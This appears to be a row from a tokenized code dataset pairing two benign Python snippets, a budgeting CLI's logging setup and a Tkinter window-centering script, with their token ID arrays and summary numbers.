#     Shows balance, average in aggregation method, between two dates
#   - account graph [name] [date-from] [date-to] [aggregation:...]
#   - budget import <json>
#   - budget show [name] [account]
#     Shows progress & summary of a named budget
#   - budget project [name] [unit] [aggregation:...]

import logging
# logging.basicConfig(format="[%(levelname)s] %(message)s")
import coloredlogs

# Install coloredlogs on the root logger so all module loggers inherit
# the colored, message-only format.
# TODO: maybe load format from a config file?
coloredlogs.install(fmt="%(message)s", logger=logging.getLogger())
| [
2,
43749,
198,
2,
198,
2,
49505,
25,
198,
2,
220,
220,
532,
8945,
1330,
1279,
17752,
29,
198,
2,
220,
220,
532,
8611,
905,
357,
10091,
198,
2,
220,
220,
532,
1848,
905,
685,
3672,
60,
685,
4475,
12,
6738,
60,
685,
4475,
12,
14... | 2.927966 | 236 |
from tkinter import *
from tkinter import ttk
from functools import partial


# Generate main window
# NOTE(review): Application is presumably defined earlier in this file
# -- confirm; it is not imported here.
root = Tk()
gui = Application(root)

# Necessary for winfo_width and winfo_heigh to work properly
# (forces geometry computation before the sizes are queried)
root.update()

""" Centering the window on the screen """
# https://yagisanatode.com/2018/02/24/how-to-center-the-main-window-on-the-screen-in-tkinter-with-python-3/
# Changed winfo_reqwidth and winfo_reqheight to winfo_width and winfo_height

# Gets the requested values of the height and widht.
windowWidth = root.winfo_width()
windowHeight = root.winfo_height()

# Gets both half the screen width/height and window width/height
positionRight = int(root.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(root.winfo_screenheight()/2 - windowHeight/2)

# Positions the window in the center of the page.
root.geometry("+{}+{}".format(positionRight, positionDown))

root.mainloop()
6738,
256,
74,
3849,
1330,
1635,
198,
6738,
256,
74,
3849,
1330,
256,
30488,
198,
6738,
1257,
310,
10141,
1330,
13027,
628,
628,
198,
2,
2980,
378,
1388,
4324,
198,
15763,
796,
309,
74,
3419,
198,
48317,
796,
15678,
7,
15763,
8,
198... | 3.072414 | 290 |